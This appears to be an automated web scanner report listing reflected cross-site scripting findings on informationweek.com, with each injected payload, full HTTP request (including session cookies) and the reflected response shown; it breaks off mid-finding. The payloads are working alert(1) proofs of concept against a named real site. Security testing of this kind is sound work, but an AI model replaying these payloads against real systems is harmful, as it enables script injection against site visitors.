HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:42 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:42 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 31129
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_GlobalCIO_Executive_Insights_Interviews_Welcome_Ad_1x1;key=/news342cb"><script>alert(1)</script>30da13bdb15/global-cio;kvarticleid=;kvauthor=;loc=300;grp=468734410" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc330'-alert(1)-'2028717cfd9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newsbc330'-alert(1)-'2028717cfd9/global-cio/interviews/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:44 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:44 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 31079
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... pt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_GlobalCIO_Executive_Insights_Interviews_Welcome_Ad_1x1;key=/newsbc330'-alert(1)-'2028717cfd9/global-cio/interviews/sho;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=368932088;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 560fe'-alert(1)-'7135bbf7bce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/global-cio560fe'-alert(1)-'7135bbf7bce/interviews/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:49 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:49 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30254
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/global-cio560fe'-alert(1)-'7135bbf7bce/interviews/sho;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=41133687;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49d78"><script>alert(1)</script>0f417733d6b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/global-cio49d78"><script>alert(1)</script>0f417733d6b/interviews/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:47 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:47 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30316
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/global-cio49d78"><script>alert(1)</script>0f417733d6b;kvarticleid=;kvauthor=;loc=300;grp=588046586" target="_blank"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74cfb'-alert(1)-'97a4ef750c2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/global-cio/interviews74cfb'-alert(1)-'97a4ef750c2/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:59 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:59 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 31045
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... t1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_GlobalCIO_Executive_Insights_Interviews_Welcome_Ad_1x1;key=/news/global-cio/interviews74cfb'-alert(1)-'97a4ef750c2/sho;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=43412235;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db385"><a%20b%3dc>b4bd4b44ff4 was submitted in the REST URL parameter 3. This input was echoed as db385"><a b=c>b4bd4b44ff4 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /news/global-cio/interviewsdb385"><a%20b%3dc>b4bd4b44ff4/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:54 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:54 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 31071
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_GlobalCIO_Executive_Insights_Interviews_Welcome_Ad_1x1;key=/news/global-cio/interviewsdb385"><a b=c>b4bd4b44ff4/showAr;kvarticleid=;kvauthor=;loc=300;grp=444312927" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66b99'-alert(1)-'94d3e6f12f6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news66b99'-alert(1)-'94d3e6f12f6/government/policy/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:52 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:52 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30987
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Government_Policy_and_Regulation_Welcome_Ad_1x1;key=/news66b99'-alert(1)-'94d3e6f12f6/government/policy/showArt;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=939714743;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bad26"><script>alert(1)</script>2c1bec5730d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /newsbad26"><script>alert(1)</script>2c1bec5730d/government/policy/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:51 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:51 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 31037
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Government_Policy_and_Regulation_Welcome_Ad_1x1;key=/newsbad26"><script>alert(1)</script>2c1bec5730d/government;kvarticleid=;kvauthor=;loc=300;grp=576127032" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcff4"><script>alert(1)</script>c19db7c3f4f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/governmentdcff4"><script>alert(1)</script>c19db7c3f4f/policy/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:55 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:55 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30308
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/governmentdcff4"><script>alert(1)</script>c19db7c3f4f;kvarticleid=;kvauthor=;loc=300;grp=128241705" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce91b'-alert(1)-'048c7f4ffd0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/governmentce91b'-alert(1)-'048c7f4ffd0/policy/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:57 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:57 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30258
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/governmentce91b'-alert(1)-'048c7f4ffd0/policy/showArt;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=632692783;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27bbd'-alert(1)-'9ab2e89291c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/government/policy27bbd'-alert(1)-'9ab2e89291c/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:24:08 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:24:08 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30965
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... ="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Government_Policy_and_Regulation_Welcome_Ad_1x1;key=/news/government/policy27bbd'-alert(1)-'9ab2e89291c/showArt;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=652669780;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84dc6"><a%20b%3dc>f54db508357 was submitted in the REST URL parameter 3. This input was echoed as 84dc6"><a b=c>f54db508357 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /news/government/policy84dc6"><a%20b%3dc>f54db508357/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:24:03 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:24:03 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30991
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Government_Policy_and_Regulation_Welcome_Ad_1x1;key=/news/government/policy84dc6"><a b=c>f54db508357/showArticle;kvarticleid=;kvauthor=;loc=300;grp=942378040" target="_blank"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5449d"><a%20b%3dc>6ecd8ffaaa7 was submitted in the REST URL parameter 4. This input was echoed as 5449d"><a b=c>6ecd8ffaaa7 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /news/government/policy/5449d"><a%20b%3dc>6ecd8ffaaa7 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:24:12 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:24:12 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30809
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Government_Policy_and_Regulation_Welcome_Ad_1x1;key=/news/government/policy/5449d"><a b=c>6ecd8ffaaa7;kvarticleid=;kvauthor=;loc=300;grp=244865892" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c16b2"><script>alert(1)</script>9522ca089f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /newsc16b2"><script>alert(1)</script>9522ca089f3/storage/data_protection/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:41 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:41 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30314
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/newsc16b2"><script>alert(1)</script>9522ca089f3/storage/da;kvarticleid=;kvauthor=;loc=300;grp=666505416" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b43dd'-alert(1)-'3879876ac66 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newsb43dd'-alert(1)-'3879876ac66/storage/data_protection/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:42 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:42 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30252
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/newsb43dd'-alert(1)-'3879876ac66/storage/data_protection/s;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=18618214;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5322"><script>alert(1)</script>9b23966dcf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
